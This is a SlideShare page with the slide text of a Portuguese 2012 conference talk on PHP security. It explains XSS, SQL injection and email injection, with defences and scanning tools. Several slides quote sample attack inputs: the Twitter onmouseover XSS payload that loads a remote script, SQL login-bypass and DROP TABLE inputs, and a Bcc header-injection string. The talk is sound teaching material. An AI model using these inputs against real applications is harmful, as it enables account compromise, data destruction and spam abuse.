Segurança em aplicações php

3,845 views

Published on

Slides de minha apresentação sobre segurança em PHP no PHPSC Conference 2012.

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,845
On SlideShare
0
From Embeds
0
Number of Embeds
2,358
Actions
Shares
0
Downloads
46
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Segurança em aplicações php

  1. 1. Segurança em aplicações PHP Rodrigo dos Santos rodrigodossantos.ws @rosantoz
  2. 2. Sobre mim➔ Desenvolvedor PHP desde 2004➔ Zend Certified Engineer PHP 5.3➔ Zend Framework Certified➔ Pós Graduado em Engenharia de Projetos de Software➔ Sócio-Proprietário na Ilha Web (www.ilhaweb.net) PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  3. 3. O que iremos abordar?➔ Como acontecem os principais ataques a aplicações PHP; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  4. 4. O que iremos abordar?➔ Como acontecem os principais ataques a aplicações PHP;➔ Como se previnir; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  5. 5. O que iremos abordar?➔ Como acontecem os principais ataques a aplicações PHP;➔ Como se previnir;➔ Ferramentas de diagnóstico (e de ataque); PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  6. 6. 3 Regras Básicas de Segurança PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  7. 7. 3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  8. 8. 3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada;2) Escape os dados de saída; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  9. 9. 3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada;2) Escape os dados de saída;3) Nunca confie em seus usuários; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  10. 10. XSS – Cross-Site Scripting PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  11. 11. XSS – Cross-Site Scripting Injeção de código HTML, CSS ou Javascript em uma página. PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  12. 12. XSS – Cross-Site ScriptingO javascript representa a maior ameaça por possibilitar:1) Redirecionar o usuário para outra página;2) Modificar a página;3) Ler os cookies. PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  13. 13. XSS – Cross-Site ScriptingMas como acontece? PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  14. 14. XSS – Cross-Site ScriptingMas como acontece? PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  15. 15. XSS – Cross-Site Scripting Twitter Hackhttp://edition.cnn.com/2010/TECH/social.media/09/21/twitter.security.flaw/index.html PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  16. 16. XSS – Cross-Site ScriptingTwitter Hack http://t.co/@"style="font- size:999999999999px;"onmouseover="$.getScript (http:u002fu002fis.gdu002ffl9A7)"/ PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  17. 17. XSS – Cross-Site ScriptingComo evitar? ➔ htmlspecialchars() ➔ htmlentities() ➔ strip_tags() ➔ Whitelist PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  18. 18. XSS – Cross-Site ScriptingFerramenta de diagnóstico: PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  19. 19. SQL Injection PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  20. 20. SQL Injection Injeção de uma instrução SQL através de parâmetros recebidos pela por um sistema. PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  21. 21. SQL Injection PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  22. 22. SQL InjectionMas como acontece? PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  23. 23. SQL InjectionMas como acontece? PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  24. 24. SQL InjectionMas como acontece?usuário: qualquersenha: OR = PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  25. 25. SQL InjectionMas como acontece?usuário: qualquersenha: OR = PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  26. 26. SQL InjectionMas como acontece?usuário: qualquer; DROP TABLE usuarios ; --senha: 1234 PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  27. 27. SQL InjectionMas como acontece?usuário: qualquer; DROP TABLE usuarios ; --senha: 1234 PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  28. 28. SQL InjectionComo evitar? ➔ mysql_real_escape_string() ➔ Prepared Statement PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  29. 29. SQL InjectionSQL Injection no mundo real PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  30. 30. SQL InjectionFerramenta de diagnóstico: PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  31. 31. Email InjectionComo acontece: PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  32. 32. Email InjectionComo acontece:Campo nome:José da Silva <josedasilva@provedor.com>nBcc <email2@provedor.com>,<email3@provedor.com>, <email4@provedor.com> PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  33. 33. Email InjectionComo evitar: ➔ Valide o email do usário; ➔ Não use mail() para enviar email; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  34. 34. Ferramentas de Diagnóstico XSS Me https://addons.mozilla.org/en-US/firefox/addon/xss-me/ PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  35. 35. Ferramentas de Diagnóstico SQL Inject Me https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  36. 36. Ferramentas de Diagnóstico Skipfish http://code.google.com/p/skipfish/downloads/list PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  37. 37. Ferramentas de Diagnóstico Acunetix (free edition) http://www.acunetix.com/cross-site-scripting/scanner.htm PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  38. 38. Ferramentas de Diagnóstico ZAP code.google.com/p/zaproxy/ PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  39. 39. Recomendação OWASP https://www.owasp.org PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  40. 40. Perguntas?PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  41. 41. Obrigado @rosantoz falecom@rodrigodossantos.wsPHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012

×